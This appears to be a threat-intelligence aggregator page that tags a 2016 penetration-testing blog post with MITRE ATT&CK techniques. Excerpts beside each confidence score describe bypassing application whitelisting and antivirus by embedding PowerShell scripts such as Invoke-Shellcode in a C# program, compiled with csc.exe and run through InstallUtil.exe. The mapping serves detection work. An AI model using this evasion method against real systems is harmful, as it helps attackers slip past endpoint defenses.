TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Black Hills InfoSec

Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV

BHIS · 2016-08-31 · Read original ↗

ATT&CK techniques detected

9 predictions
T1059.001PowerShell
100%
“a method to execute powershell scripts in environments that have application whitelisting enabled and have disabled access to powershell. exe and cmd. exe. you can run virtually any powershell script that you want to with this. just a few items to note though : - make sure your s…”
T1059.001PowerShell
100%
“for executing the invoke - shellcode. ps1 file from within a c # program. essentially, you turn the invoke - shellcode. ps1 file into one, long, single - line and embed it as a string variable within the c # program. the result is a stand - alone executable that spawns a meterpre…”
T1059.001PowerShell
100%
“powershell without powershell – how to bypass application whitelisting, environment restrictions & av powershell without powershell – how to bypass application whitelisting, environment restrictions & av brian fehrman ( with shout outs to : kelsey bellew, beau bullock ) / / in a …”
T1059.001PowerShell
99%
“our program is to define the mycode class and a method named exec. the method reads in a powershell script that is located at the path that is defined in the @ ” “ notation. in this case, my powershell script is located at c : \ users \ fmc \ desktop \ powerup. ps1. the lines tha…”
T1059.001PowerShell
96%
“your powershell scripts do … but why go through all that work when you already have the powershell scripts? enough talk, let ’ s do this! create a new, blank text - file on your windows desktop and name it program. cs. you can call it whatever you want … but that ’ s just a sugge…”
T1218.004InstallUtil
93%
“entry point for our program. we will be using the installutil. exe utility to run our program rather than executing it directly. this is the wizardry that can allow us to bypass application - whitelisting restrictions. in order to do this, we define a class named sample that inhe…”
T1218.004InstallUtil
89%
“we need to run our program by using the installutil. exe utility. this process will be similar to how we used the csc. exe application. navigate back to : c : \ windows \ microsoft. net \ framework64 \ v2. 0. 50727 \ right - click on the installutil. exe file and choose create sh…”
T1218.004InstallUtil
80%
“the properties window. now, head back to your desktop if you ’ re not already there. drag the powerup. exe file onto the installutil shortcut file. you should see a command prompt pop up while the script executes. if you open task manager, however, you ’ ll notice that cmd. exe i…”
T1027.004Compile After Delivery
55%
“\ fmc \ desktop \ allchecks. txt now we need to compile our program. we are going to use the csc. exe utility to perform the compilation. we have to pass in a couple of flags in order for the program to properly compile. the following command can be used to compile the program. c…”

Summary

Brian Fehrman (With shout outs to: Kelsey Bellew, Beau Bullock) // In a previous blog post, we talked about bypassing AV and Application Whitelisting by using a method developed by Casey Smith. In […]

The post Powershell Without Powershell – How To Bypass Application Whitelisting, Environment Restrictions & AV appeared first on Black Hills Information Security, Inc..